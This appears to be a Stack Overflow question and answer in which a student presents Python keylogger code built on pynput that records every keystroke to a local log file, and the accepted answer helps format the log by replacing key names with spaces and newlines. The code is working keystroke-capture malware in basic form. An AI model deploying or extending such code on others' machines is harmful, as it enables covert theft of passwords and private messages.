# How to refine the log file created by python keylogger

Tags: python, keylogger

I'm currently working on my school project which is about making a keylogger using python. I found this code online:

```
import pynput
from pynput.keyboard import Key, Listener
keys=[]
def on_press(key):
    keys.append(key)
    write_file(keys)

    try:
        print(key.char)
    except AttributeError:
        print(key)

def write_file(keys):
    with open ('log.txt','w') as f:
        for key in keys:
            #for removing quotes
            k=str(key).replace("'","")
            f.write(k)

with Listener(on_press=on_press) as listener:
    listener.join()
```

and it creates the log file as follows:
[log file](https://i.stack.imgur.com/GgpPc.png)

However, I want something like this, where instead of "Key.space", it prints an actual space, and instead of "Key.enter", it automatically creates a new line.
That's my desired output:
[Desired output](https://i.stack.imgur.com/t2N0m.png)

Comment: *imagine not activating windows* xd

Comment: I keep doing that again and again, and it keeps deactivating on its own after every 15 to 20 days

Answer (score 0, accepted):

```
with open ('log.txt','w') as f:
    for key in keys:
        #for removing quotes
        k=str(key).replace("'","")
        f.write(k)
```

Simply replace that `f.write(k)` with some `.replace()` calls.

```
with open ('log.txt','w') as f:
    for key in keys:
        #for removing quotes
        k=str(key).replace("'","")
        f.write(k.replace("Key.space", ' '))
```

You can subsequently call `replace` as many times as you like, for example like this:

```
f.write(k.replace("Key.space", ' ').replace("Key.enter", '\n'))
```

Comment: Thank you so much for answering. It helped me in removing spaces. However, if I repeat this code to replace "Key.enter" as well, it prints every word twice. Like "fb.com" is printed as "ffbb..ccoomm". How do I use replace function for two strings simultaneously?

Comment: Let me edit and tell me if you still have this error.

Comment: OMG it actually worked. You're a life savior sir!

Comment: Nothing. But actually "madam" 